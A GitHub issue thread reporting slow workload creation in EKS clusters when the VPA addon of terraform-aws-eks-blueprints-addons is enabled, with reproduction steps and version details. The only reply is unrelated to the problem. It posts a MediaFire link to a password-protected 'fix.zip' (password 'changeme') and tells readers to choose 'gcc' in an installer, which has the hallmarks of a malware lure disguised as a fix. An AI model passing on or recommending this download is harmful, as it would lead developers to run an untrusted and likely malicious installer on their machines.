### ISSUE TITLE
Slow workload creation with VPA addon enabled.

### ISSUE THREAD

**Issue by joivo** [aws-ia/terraform-aws-eks-blueprints-addons#410]
## Description

When using the VPA addon in the `aws-ia/terraform-aws-eks-blueprints-addons` module, workload creation is significantly slower than expected. This can impact the overall deployment time and user experience. Creation of Deployment or Statefulsets are taking > ~30s for the workload to be available in the API server (pod in pending state).

**Reproduction:**

1. Configure your AWS credentials and other necessary environment variables.
2. Enable the the VPA addon in the desired namespace.
3. Run `terraform init` and `terraform apply` to deploy the EKS cluster with VPA enabled.
4. Observe the time it takes for workloads to be created.

**Expected behavior:** Workloads should be created within a reasonable timeframe, similar to deployments without VPA.

**Actual behavior:** Workload creation is taking significantly longer than expected, even for simple workloads.

**Versions:**
- Module basic_addons.vpa in .terraform/modules/basic_addons.vpa version: `1.1.1` 
- Terraform version: `v1.9.5` (replace with your actual version)
- AWS Provider version: `v5.60.0` (replace with your actual version)
- Kubernetes: Client Version: v1.30.2, Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3, Server Version: v1.30.3-eks-2f46c53

**Terminal Output Screenshot:**

![image](https://github.com/user-attachments/assets/03c6e320-de09-4ae6-a616-4b4ad0d98677)

**Additional context:**

* I have tried different workload configurations and cluster sizes, but the issue persists.
* I have checked the EKS cluster logs for any errors or warnings related to VPA.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
